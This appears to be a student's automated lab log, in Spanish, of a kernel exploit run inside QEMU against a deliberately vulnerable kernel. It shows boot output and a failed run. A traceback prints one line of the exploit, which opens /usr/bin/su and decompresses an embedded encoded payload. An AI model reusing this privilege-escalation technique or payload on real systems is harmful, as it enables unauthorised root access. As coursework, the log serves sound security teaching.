=== HITO 2: EXPLOIT AUTOMÁTICO ===
Fecha: Mon May 18 02:18:48 UTC 2026
STUDENT_ID: Matias-Quinteros
Kernel: bzImage_vuln

--- Salida del exploit y del sistema ---
c[?7l[2J[0mSeaBIOS (version 1.16.3-debian-1.16.3-2)


iPXE (https://ipxe.org) 00:03.0 CA00 PCI2.10 PnP PMM+0EFCAE00+0EF0AE00 CA00
Press Ctrl-B to configure iPXE (PCI 00:03.0)...                                                                               


Booting from ROM...
c[?7l[2J[INIT] /proc mount status:
none on /proc type proc (rw,relatime)
[INIT] /proc content sample:
1
10
11
12
13
14
15
16
17
18
19
2
27
28
3
4
5
6
7
8
[INIT] /proc/modules content:
[INIT] /proc/self/mounts:
rootfs / rootfs rw 0 0
none /proc proc rw,relatime 0 0
none /sys sysfs rw,relatime 0 0
none /dev devtmpfs rw,relatime 0 0
none /tmp tmpfs rw,relatime 0 0

  ╔══════════════════════════════════════════╗
  ║   KERNEL VULNERABLE — CVE-2026-31431     ║
  ║   6.12.0               ║
  ╚══════════════════════════════════════════╝

Traceback (most recent call last):
  File "/home/student/copy_fail_exp.py", line 8, in <module>
    f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
      ^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '/usr/bin/su'
EXPLOIT_DONE
/bin/sh: can't access tty; job control turned off
/ $ qemu-system-x86_64: terminating on signal 15 from pid 69482 (timeout)
